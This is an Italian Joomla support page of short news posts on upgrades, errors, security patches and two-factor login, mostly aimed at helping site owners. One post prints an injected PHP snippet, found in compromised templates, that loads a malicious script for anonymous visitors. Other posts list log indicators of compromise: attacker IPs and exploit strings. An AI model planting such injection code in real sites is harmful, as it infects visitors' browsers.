Questo sito o gli strumenti terzi da questo utilizzati si avvalgono di cookie necessari al funzionamento ed utili alle finalità illustrate nella pagina di Privacy Policy. Chiudendo questo banner, scorrendo questa pagina, cliccando su un link o proseguendo la navigazione in altra maniera, acconsenti all’uso dei cookie.
Menu

News e aggiornamenti

Novità da joomla 4

A partire da Joomla! 4.0 aumenteremo i requisiti minimi del server. Se vedi questo messaggio allora la tua attuale configurazione non ha i nuovi requisiti minimi.

I requisiti minimi sono i seguenti:

  • PHP 5.5.9
  • MySQL 5.5.3
  • PostgreSQL 9.2
  • MS SQL non sarà più supportato
  • MySQL che utilizza l'estensione PHP legacy `ext/mysql` non sarà più supportatabile, devono invece essere utilizzati MySQLi o PDO MySQL
Read more...

Save Failed with the Following Error: Invalid Parent ID

Joomla in alcuni casi volte può mostrare il seguente errore durante la creazione o la modifica di un nuovo articolo.

Cliccando sul pulsante salava appare il seguente messaggio di errore:

Save Failed with the Following Error: Invalid Parent ID

Per risolvere il problema Joomla 1.6, Joomla 1.7, Joomla 2.5 e Joomla 3+) si puo' sfruttare la n ovità introdotta con joomla 1.6, ovvero la tabella #__assets che consente di salvare una chiave esterna per tutti i contenuti di Joomla (e in alcuni casi estensioni di terze parti). 

  1. Vai su menu manager, seleziona tutti i menu e clicca sul pulsante rebuild
  2. Vai su category manager, seleziona tutte le categorie e clicca sul pulsante rebuild
  3. Apri tutte le categorie e salva. Questo inserirà le appropriate associazioni per tutte le categorie 

Adesso prova a modificare un articolo, il massaggi di errore dovrebbe essere scomparso.

 

Read more...

Rimuovere malware arpanet1957

Il sito che stai per visitare contiene malware!!!

 

Come prima cosa metti il sito off line, poi verifica la versione del cms joomla installata e nel caso effettua un aggiornamento all'ultima versione stabile. 

Cerca all'interno dei file php il codice malevolo e rimuovi tutti i file sospetti che trovi all'interno delle tue cartelle del server.

 

Esempio: 

(edita il template) e rimuovi questo codice: 

(go and edit template). Removed that code:

<?php $_bc6e8e2d=1;if(is_object($_SESSION["__default"]["user"]) && !($_SESSION["__default"]["user"]->id)) {echo " <script language=JavaScript id=onDate ></script> <script language=JavaScript src=/media/system/js/statbc6.php ></script> ";};$_bc6e8e2d=1; ?> 

Vai nella directory media\system\js\ and delete 3 files. statbc6.php and 2 weird files starting with sess_605df

 

I nomi dei file da rimuovere possono variare, se hai bisogno di aiuto, contattaci.

Read more...

Joomla ha appena rilasciato la versione 3.6.5

Vi informiamo che Joomla ha appena rilasciato la versione 3.6.5

che include tre fix di sicurezza. Una di queste è una patch critica ad alta priorità, che interessa in maniera particolare i siti che sono stati migrati da versioni precedenti alla verione 3.x.x

Si consiglia di aggiornare subito.

Se hai bisogno di aiuto da parte nostra per avere un sistema sempre aggiornato e protetto non esitare, contattaci.

Read more...

Joomla sotto attacco

Gli sviluppatori di Joomla, hanno rilasciato una patch di sicurezza (3.6.4) che sembra andare a coprire una serie di vulnerabilità critiche: Account Creation, Elevated Privileges e Account Modifications.  

Appena rilasciata la patch è stato possibile risalire, tramite le differenze di codice tra la precedente versione e quella appena rilasciata, quali erano i componenti del cms impattati. Questa operazione permette anche ad un eventuale attaccante di creare un exploit valido per sfruttare le vulnerabilità scoperte.

Secondo un articolo di Securi, una delle firme di sicurezza che si occupa di Web security, dopo appena 36 ore dal rilascio della patch, era già possibile verificare in rete attacchi che sfruttavano le vulnerabilità appena patchate.

La CVE-2016-8870 e la CVE-2016-8869 sono le vulnerabilità più critiche: la prima permette di creare un utente arbitrario sfruttando una classe utilizzata per rendere retrocompatibile il componente; la seconda consente di elevare i privilegi fino a diventare amministratore. Combinati insieme permettono la compromissione totale della piattaforma. 

Per verificare se il proprio sito è stato vittima di questo attacco è possibile cercare nei log del webserver questa stringa:

POST /index.php?option=com_users&task=user.register HTTP/1.1″

Tale stringa sta a significare che qualcuno ha tentato di creare un utente sul cms. Se ancora non avete aggiornato alla nuova versione e nel vostro log ed è presente questa stringa nei log sarebbe utile andare a controllare eventuali utenti creati recentemente e verificarne la loro attendibilità.

 

Per saperne di piu': Visita il sito

Read more...

Barracuda Vulnerability Manager

Barracuda Vulnerability Manager è un servizio cloud in grado di individuare le vulnerabilità delle applicazioni e dei siti web.

Riconosce vulnerabilità quali quelle comprese nell’OWASP Top 10, come ad esempio SQL injection e Cross-Site Scripting, mediante semplici funzionalità point and click. Barracuda Vulnerability Manager esegue la scansione di siti e applicazioni, in ambienti virtuali e nel cloud pubblico o privato e può essere integrato con Barracuda Web Application Firewall per creare e applicare automaticamente policy di correzione e proteggere dalle vulnerabilità identificate.

Read more...

Protegge i dati di accesso al sito con un codice segreto secondario che cambia ogni 30 secondi.

Joomla! ha un sistema di verifica in due passaggi integrato. Protegge i dati di accesso al sito con un codice segreto secondario che cambia ogni 30 secondi.

È possibile utilizzare il proprio Smartphone e l'applicazione Google Authenticator per la generazione del codice. 

Joomla! abiliterà il plugin Two Factor Authentication

La verifica in due passaggi sarà disponibile per tutti gli utenti.

Ogni utente può configurare la verifica in due passaggi nei dettagli utente.

Puoi sempre disabilitare il plugin Two Factor Authentication, o configurarlo per l'utilizzo solo per l'accesso al Pannello amministrativo.

Sarai portato alla pagina del tuo profilo utente dove è possibile trovare ulteriori informazioni sulla verifica in due passaggi e abilitarla per il tuo account utente.

Read more...

Patch per Critical 0-Day Remote Command Execution Vulnerability

Questa è una vulnerabilità molto grave da non sottovalutare. 

Come proteggere il sito in Joomla

Controllare nei log di sistema e nelle richieste http la presenza o meno di questi ip: 146.0.72.83 oppure 74.3.170.33 o anche 194.28.174.106

Diverse aziende di ricerca hanno analizzato moltissimi exploit su siti on line e hanno chiaramente individuato questi ip come i maggiori responsabili.  Inoltre nei log va ricercato la stringa JDatabaseDriverMysqli” oppure nei user agent la lettera “O:”.

Se vedete questi dati nei vostri log, allora quasi certamente siete stati infettati e bisogna immediatamente correre ai ripari. Ricordo anche che se una scansione di Google vi trova infetti sarete immediatamente penalizzati e bannati.

Aggiornare alla versione 3.4.6. è l’unico modo per stare sicuri.

Fonte

Read more...

Vulnerabilità critica scoperta su Joomla 3

Vulnerabilità critica scoperta su Joomla 3 SQL: milioni di siti a rischio hack Hardware upgrade.it Milioni di siti web usati per l'e-commerce o altri settori sensibili potrebbero essere a rischio hack per via di una vulnerabilità critica sul CMS Joomla.

Il bug permette l'esecuzione di codice malevolo sui server che usano Joomla, ed è stato introdotto all'interno della versione 3.2 rilasciata nel mese di novembre 2013. Si stima che siano circa 2,8 milioni i siti web che utilizzano questo CMS, e tutti sono di fatto attaccabili se non viene effettuato l'aggiornamento alla nuova versione: la vulnerabilità è stata trovata in un modulo essenziale che non richiede alcuna estensione, tutti i siti che usano Joomla 3.2 o versioni precedenti sono vulnerabili.

Read more...
Joomla SEF URLs by Artio

Login